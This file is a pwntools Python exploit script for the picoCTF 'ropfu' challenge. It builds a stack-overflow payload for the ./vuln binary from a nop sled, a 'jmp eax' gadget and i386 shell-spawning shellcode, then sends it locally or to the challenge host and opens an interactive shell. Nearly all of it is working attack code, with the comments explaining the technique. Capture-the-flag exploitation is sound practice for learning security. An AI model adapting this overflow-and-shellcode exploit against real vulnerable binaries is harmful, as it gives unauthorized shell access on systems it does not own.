#!/usr/bin/env nix-shell
#!nix-shell -i python3 -p "python3.withPackages (ppkgs: with ppkgs; [ pwntools ])"
from pwn import *
# Target binary for the ropfu challenge.  Binding it to context.binary lets
# asm()/ROP() pick up the binary's architecture automatically.
exe = ELF("./vuln")
context.binary = exe

# Remote instance (used when the script is run with REMOTE=1).  The port is
# kept as a string, exactly as the original split() produced it.
ADDR, PORT = "saturn.picoctf.net", "60930"
def conn():
    """Open a pwntools tube to the target.

    With ``REMOTE`` set on the command line (pwntools ``args``) this connects
    to ``ADDR:PORT``; otherwise it spawns the local ``./vuln`` process.
    """
    if args.REMOTE:
        return remote(ADDR, PORT)
    return process([exe.path])
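def _build_payload(offset: int = 28) -> bytes:
    """Build the stack-smash payload for ropfu.

    Layout, counted from the start of the overflowed buffer::

        [nop sled][jmp $+6][addr of 'jmp eax' gadget][shellcode]

    The saved return address is overwritten with a ``jmp eax`` gadget.  This
    relies on eax still pointing at the buffer when the function returns
    (presumably the return value of the overflowing read - TODO confirm in
    the disassembly); control then lands at the buffer start, slides over the
    nops, and the 2-byte ``jmp $+6`` hops over the 4-byte gadget address into
    the shellcode.

    offset -- distance in bytes from the buffer start to the saved return
              address (28 was measured with pwndbg for this binary).
    Raises ValueError if ``offset`` cannot hold the jmp stub and RuntimeError
    if the binary contains no ``jmp eax`` gadget.
    """
    # jmp $+0x6 assembles to "eb 04": 2 bytes for the jmp itself plus 4 bytes
    # of return-address slot to skip.
    jmp_over_ret = asm("jmp $+0x6")
    if offset < len(jmp_over_ret):
        raise ValueError("offset too small to fit the jmp stub")

    # NOTE: rop.find_gadget(['jmp eax']) does not work because the gadget
    # does not end with 'ret'; search the raw bytes instead.
    try:
        jmp_eax_gadget = next(exe.search(asm("jmp eax")))
    except StopIteration:
        raise RuntimeError("no 'jmp eax' gadget found in the binary") from None

    rop = ROP(exe)
    rop.raw(asm("nop") * (offset - len(jmp_over_ret)))
    rop.raw(jmp_over_ret)
    rop.raw(jmp_eax_gadget)
    rop.raw(asm(shellcraft.i386.linux.sh()))

    payload = rop.chain()
    # The payload is sent with sendline(); if the target's read is
    # line-oriented (e.g. gets/fgets) an embedded newline would truncate it
    # before the shellcode.  Warn rather than fail - TODO confirm the read.
    if b"\n" in payload:
        log.warning("payload contains a newline; a line-oriented read would truncate it")
    return payload


def main() -> None:
    """Connect (local, or remote with REMOTE=1), consume the banner, send the payload and hand over an interactive shell."""
    r = conn()
    print(r.recvuntil(b"How strong is your ROP-fu? Snatch the shell from my hand, grasshopper!\n"))
    r.sendline(_build_payload())
    r.interactive()
    r.close()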
# Only run the exploit when executed directly, so the module can be imported
# (e.g. to reuse conn()) without side effects.
if __name__ == "__main__":
    main()